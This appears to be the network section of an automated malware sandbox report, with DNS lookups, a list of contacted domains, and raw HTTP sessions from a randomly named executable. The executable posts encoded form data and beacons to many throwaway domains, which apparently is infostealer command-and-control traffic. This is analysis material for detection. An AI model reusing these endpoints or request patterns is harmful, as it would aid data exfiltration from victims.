Dec 2, 2024 15:25:58.784657955 CET | 1.1.1.1 | 192.168.2.5 | 0xbae8 | No error (0) | www.jcsa.info |  | 208.91.197.39 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:26:14.882216930 CET | 1.1.1.1 | 192.168.2.5 | 0x36ac | No error (0) | www.1secondlending.one |  | 43.205.198.29 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:26:29.946559906 CET | 1.1.1.1 | 192.168.2.5 | 0x321d | No error (0) | www.zkdamdjj.shop |  | 172.67.187.114 | A (IP address) | IN (0x0001) | false
Dec 2, 2024 15:26:29.946559906 CET | 1.1.1.1 | 192.168.2.5 | 0x321d | No error (0) | www.zkdamdjj.shop |  | 104.21.40.167 | A (IP address) | IN (0x0001) | false
                                                                                                                  Dec 2, 2024 15:26:45.550964117 CET1.1.1.1192.168.2.50xd7bbNo error (0)www.rgenerousrs.store172.67.167.146A (IP address)IN (0x0001)false
                                                                                                                  Dec 2, 2024 15:26:45.550964117 CET1.1.1.1192.168.2.50xd7bbNo error (0)www.rgenerousrs.store104.21.57.248A (IP address)IN (0x0001)false
                                                                                                                  Dec 2, 2024 15:27:01.153955936 CET1.1.1.1192.168.2.50x7a44No error (0)www.bpgroup.sitebpgroup.siteCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Dec 2, 2024 15:27:01.153955936 CET1.1.1.1192.168.2.50x7a44No error (0)bpgroup.site74.48.143.82A (IP address)IN (0x0001)false
• www.thaor56.online
• www.optimismbank.xyz
• www.greenthub.life
• www.laohub10.net
• www.bankseedz.info
• www.madhf.tech
• www.xcvbj.asia
• www.yc791022.asia
• www.43kdd.top
• www.jcsa.info
• www.1secondlending.one
• www.zkdamdjj.shop
• www.rgenerousrs.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49751 | 202.92.5.23 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:23:38.126090050 CET | 499 | OUT | GET /fev0/?wzcP=iLdd&bV=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/SU+87cwr0VJj825LSMeKmzjVPSaMyWz8le8KSNg+oL/g== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.thaor56.online
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 2, 2024 15:23:39.782633066 CET | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 02 Dec 2024 14:23:39 GMT
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Dec 2, 2024 15:23:39.782644987 CET | 234 | IN | Data Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49790 | 13.248.169.48 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:23:55.627921104 CET | 771 | OUT | POST /98j3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Connection: close
Host: www.optimismbank.xyz
Origin: http://www.optimismbank.xyz
Referer: http://www.optimismbank.xyz/98j3/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 70 48 77 59 46 66 44 30 32 6d 6e 4b 51 33 72 76 32 57 6a 47 77 59 45 68 52 43 38 31 30 4a 69 4a 4a 30 51 72 48 58 4d 3d
Data Ascii: bV=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMpHwYFfD02mnKQ3rv2WjGwYEhRC810JiJJ0QrHXM=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49797 | 13.248.169.48 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:23:58.367033005 CET | 791 | OUT | POST /98j3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Connection: close
Host: www.optimismbank.xyz
Origin: http://www.optimismbank.xyz
Referer: http://www.optimismbank.xyz/98j3/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 6a 48 58 45 73 4b 48 5a 51 52 4c 6a 50 4a 6d 37 46 62 42 64 6e 53 30 59 50 69 34 58 2b 76 48 62 61 42 62 61 46 79 42 34 2f 48 50 59 62 6d 4b 61 4e 45 4b 54 6f 76 75 59 68 75 4a 41 64 31 31 64 51 59 48 4c 51 42 56 34 57 43 49 75 61 4c 78 41 6b 32 4d 4c 34 72 48 33 6c 59 51 42 4e 39 41 5a 6e 43 58 55 58 45 5a 41 5a 54 34 4e 6b 73 36 4f 47 56 6f 78 64 6f 6b 57 59 57 41 4e 61 43 6e 32 66 6b 59 68 61 46 73 30 72 75 6a 34 6f 5a 42 52 30 43 6c 35 44 67 54 58 41 62 5a 41 59 5a 49 7a 57 52 56 79 74 48 42 61 4e 63 4f 65 4a 67 68 39 77 64
Data Ascii: bV=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj4oZBR0Cl5DgTXAbZAYZIzWRVytHBaNcOeJgh9wd


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49804 | 13.248.169.48 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:01.235642910 CET | 1808 | OUT | POST /98j3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Connection: close
Host: www.optimismbank.xyz
Origin: http://www.optimismbank.xyz
Referer: http://www.optimismbank.xyz/98j3/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 72 48 58 32 6b 4b 48 34 51 52 4b 6a 50 4a 6c 37 46 57 42 64 6e 50 30 59 57 72 34 58 44 4e 48 59 69 42 5a 35 4e 79 52 4e 54 48 45 59 62 6d 58 4b 4e 51 4f 54 70 31 75 59 78 71 4a 41 4e 31 31 64 51 59 48 49 59 42 52 73 43 43 45 4f 61 49 34 67 6b 41 47 62 34 58 48 33 39 69 51 42 41 4b 41 4a 48 43 58 77 7a 45 4b 6a 78 54 6b 64 6b 55 35 4f 47 4e 6f 78 52 33 6b 57 55 30 41 4d 2b 6f 6e 31 50 6b 4f 47 4c 41 39 6b 62 6e 36 4a 67 4f 47 52 38 55 36 59 6a 64 53 31 45 77 61 78 41 47 4b 48 62 36 57 47 59 41 44 5a 67 50 4d 66 56 58 73 4a 6c 37 32 6d 59 77 34 78 6e 68 49 72 73 42 47 32 59 53 46 2f 46 69 76 49 53 6d 33 4d 58 45 48 75 70 2b 68 42 79 41 61 31 4c 43 45 6f 69 5a 2b 33 38 68 47 6a 6e 32 30 5a 4e 33 55 70 66 4b 72 43 6d 49 6e 36 36 4e 50 38 56 79 45 52 4c 39 35 6d 74 6c 61 58 73 4c 44 53 71 35 45 6d 69 38 67 32 45 79 43 37 6e 38 56 68 62 78 53 68 4c 30 64 48 55 7a 44 37 41 [TRUNCATED]
Data Ascii: bV= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49809 | 13.248.169.48 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:03.972923994 CET | 501 | OUT | GET /98j3/?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.optimismbank.xyz
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 2, 2024 15:24:05.071458101 CET | 400 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Mon, 02 Dec 2024 14:24:04 GMT
Content-Type: text/html
Content-Length: 260
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 56 3d 6a 6f 31 69 4a 4f 6e 6a 38 75 65 47 5a 50 4a 41 42 66 32 67 30 48 38 48 75 4f 4b 62 4a 67 56 31 44 64 74 53 61 43 53 51 4c 35 76 33 55 45 59 42 45 35 56 41 54 67 72 71 67 75 39 79 43 59 58 55 31 71 54 38 31 55 47 32 48 62 4f 4c 51 4c 42 62 5a 4e 44 6f 4d 62 65 6c 53 4b 67 72 4b 43 34 51 75 4a 5a 47 46 44 4e 38 77 49 34 69 4a 37 6b 41 61 4a 62 45 48 66 2b 49 35 43 38 77 42 72 4a 5a 65 67 3d 3d 26 77 7a 63 50 3d 69 4c 64 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bV=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbelSKgrKC4QuJZGFDN8wI4iJ7kAaJbEHf+I5C8wBrJZeg==&wzcP=iLdd"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49825 | 209.74.77.109 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:10.680368900 CET | 765 | OUT | POST /r3zg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Connection: close
Host: www.greenthub.life
Origin: http://www.greenthub.life
Referer: http://www.greenthub.life/r3zg/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Raw: 62 56 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6e 6e 6a 4a 45 2f 79 42 66 74 61 34 77 30 36 48 34 47 72 78 65 6b 6a 6e 4a 4a 72 54 65 79 6a 46 36 48 4b 6e 73 79 4d 32 71 7a 76 70 61 76 32 6d 4d 4e 39 78 38 78 36 66 46 6e 42 54 52 59 58 61 59 51 69 65 48 4d 4f 69 2f 35 6f 38 76 4d 35 78 73 6a 43 76 41 4e 56 78 76 65 64 53 77 33 46 38 43 32 4c 62 6b 6d 6f 5a 36 63 33 63 2b 71 35 6b 44 6e 68 55 37 64 44 64 5a 63 47 67 59 6e 6c 44 43 45 58 44 72 6d 4b 37 44 68 62 73 5a 6b 77 64 36 39 43 79 51 71 73 4d 37 4d 56 61 70 39 36 4a 65 4d 43 6f 37 55 51 47 4a 30 37 72 31 2b 6c 42 57 74 4e 59 48 6d 6e 62 34 42 6f 3d
Data Ascii: bV=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyQqsM7MVap96JeMCo7UQGJ07r1+lBWtNYHmnb4Bo=
Dec 2, 2024 15:24:11.910187960 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 14:24:11 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.549832209.74.77.10980728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:24:13.418637037 CET785OUTPOST /r3zg/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Connection: close
                                                                                                                  Host: www.greenthub.life
                                                                                                                  Origin: http://www.greenthub.life
                                                                                                                  Referer: http://www.greenthub.life/r3zg/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
    Data Ascii: bV=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUXTltt2HdsxdF3rmW9/F8iafPcrDKQdZIhvaTFR
Dec 2, 2024 15:24:14.605081081 CET | 533 | IN | HTTP/1.1 404 Not Found
    Date: Mon, 02 Dec 2024 14:24:14 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49839 | 209.74.77.109 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:16.083868027 CET | 1802 | OUT | POST /r3zg/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1239
    Connection: close
    Host: www.greenthub.life
    Origin: http://www.greenthub.life
    Referer: http://www.greenthub.life/r3zg/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 2, 2024 15:24:17.348841906 CET | 533 | IN | HTTP/1.1 404 Not Found
    Date: Mon, 02 Dec 2024 14:24:17 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49846 | 209.74.77.109 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:18.745285034 CET | 499 | OUT | GET /r3zg/?bV=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06b5FqqYL9BGdKsZ2rM8t/H5MOkDBuj8Escbc06JqN3wYtw==&wzcP=iLdd HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    Host: www.greenthub.life
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 2, 2024 15:24:20.056024075 CET | 548 | IN | HTTP/1.1 404 Not Found
    Date: Mon, 02 Dec 2024 14:24:19 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49863 | 202.79.161.151 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:26.166685104 CET | 759 | OUT | POST /n2c9/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 203
    Connection: close
    Host: www.laohub10.net
    Origin: http://www.laohub10.net
    Referer: http://www.laohub10.net/n2c9/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
    Data Ascii: bV=6zXbcNT7Su38XueXmjPsZmsmxKs+GxcTc5shML+/WmIaIkMwwKhg7UjEYSHe7CbsEV0xlCUloR3LAbTbOCt/Lu0RInt8BsYlkYosjCzMytMyFN3h6SXDcqLT8IhND1uuoyHGxrTb/FFZJc7Ounl9XNH5MLDIx9g87WVMvKsar1ZCznJRhgH0bdq5NTYt/lSZZzeXyu8=
Dec 2, 2024 15:24:27.531204939 CET | 532 | IN | HTTP/1.1 200 OK
    Server: Apache
    Content-Type: text/html; charset=utf-8
    Accept-Ranges: bytes
    Cache-Control: max-age=86400
    Age: 1
    Connection: Close
    Content-Length: 357
    Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49869 | 202.79.161.151 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:28.848989010 CET | 779 | OUT | POST /n2c9/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 223
    Connection: close
    Host: www.laohub10.net
    Origin: http://www.laohub10.net
    Referer: http://www.laohub10.net/n2c9/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
